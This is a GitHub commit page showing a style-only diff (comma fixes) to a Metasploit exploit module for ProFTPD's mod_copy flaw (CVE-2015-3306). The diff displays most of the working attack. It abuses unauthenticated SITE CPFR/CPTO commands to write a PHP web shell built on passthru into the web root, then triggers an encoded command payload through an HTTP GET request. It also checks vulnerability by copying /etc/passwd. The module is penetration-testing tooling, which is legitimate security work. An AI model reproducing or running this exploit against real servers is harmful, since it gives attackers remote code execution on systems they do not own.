Skip to content

Commit 8a69704

Browse files
wvuwvu
committed
Fix up commas
1 parent cc8650f commit 8a69704

File tree

1 file changed

+13
-13
lines changed

1 file changed

+13
-13
lines changed

modules/exploits/unix/ftp/proftpd_modcopy_exec.rb

Lines changed: 13 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -32,7 +32,7 @@ def initialize(info = {})
3232
'References' =>
3333
[
3434
[ 'CVE', '2015-3306' ],
35-
[ 'EDB', '36742' ],
35+
[ 'EDB', '36742' ]
3636
],
3737
'Privileged' => false,
3838
'Platform' => [ 'unix' ],
@@ -43,12 +43,12 @@ def initialize(info = {})
4343
'Compat' =>
4444
{
4545
'PayloadType' => 'cmd',
46-
'RequiredCmd' => 'generic gawk bash python perl',
46+
'RequiredCmd' => 'generic gawk bash python perl'
4747
}
4848
},
4949
'Targets' =>
5050
[
51-
[ 'ProFTPD 1.3.5', { } ],
51+
[ 'ProFTPD 1.3.5', { } ]
5252
],
5353
'DisclosureDate' => 'Apr 22 2015',
5454
'DefaultTarget' => 0))
@@ -57,9 +57,9 @@ def initialize(info = {})
5757
[
5858
OptPort.new('RPORT', [true, 'HTTP port', 80]),
5959
OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
60+
OptString.new('TARGETURI', [true, 'Base path to the website', '/']),
6061
OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),
61-
OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']),
62-
OptString.new('TARGETURI', [true, 'Base path to the website', '/'])
62+
OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])
6363
], self.class)
6464
end
6565

@@ -73,13 +73,13 @@ def check
7373
print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
7474
end
7575

76-
res = sock.get_once(-1,10)
76+
res = sock.get_once(-1, 10)
7777
unless res && res.include?('220')
7878
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
7979
end
8080

8181
sock.puts("SITE CPFR /etc/passwd\r\n")
82-
res = sock.get_once(-1,10)
82+
res = sock.get_once(-1, 10)
8383
if res && res.include?('350')
8484
Exploit::CheckCode::Vulnerable
8585
else
@@ -100,33 +100,33 @@ def exploit
100100
print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
101101
end
102102

103-
res = sock.get_once(-1,10)
103+
res = sock.get_once(-1, 10)
104104
unless res && res.include?('220')
105105
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
106106
end
107107

108108
print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")
109109

110110
sock.puts("SITE CPFR /proc/self/cmdline\r\n")
111-
res = sock.get_once(-1,10)
111+
res = sock.get_once(-1, 10)
112112
unless res && res.include?('350')
113113
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
114114
end
115115

116116
sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
117-
res = sock.get_once(-1,10)
117+
res = sock.get_once(-1, 10)
118118
unless res && res.include?('250')
119119
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
120120
end
121121

122122
sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
123-
res = sock.get_once(-1,10)
123+
res = sock.get_once(-1, 10)
124124
unless res && res.include?('350')
125125
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
126126
end
127127

128128
sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
129-
res = sock.get_once(-1,10)
129+
res = sock.get_once(-1, 10)
130130
unless res && res.include?('250')
131131
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
132132
end
@@ -137,7 +137,7 @@ def exploit
137137
res = send_request_cgi!(
138138
'uri' => normalize_uri(target_uri.path, payload_name),
139139
'method' => 'GET',
140-
'vars_get' => { get_arg => "nohup #{payload.encoded} &" },
140+
'vars_get' => { get_arg => "nohup #{payload.encoded} &" }
141141
)
142142

143143
unless res && res.code == 200

0 commit comments

Comments
 (0)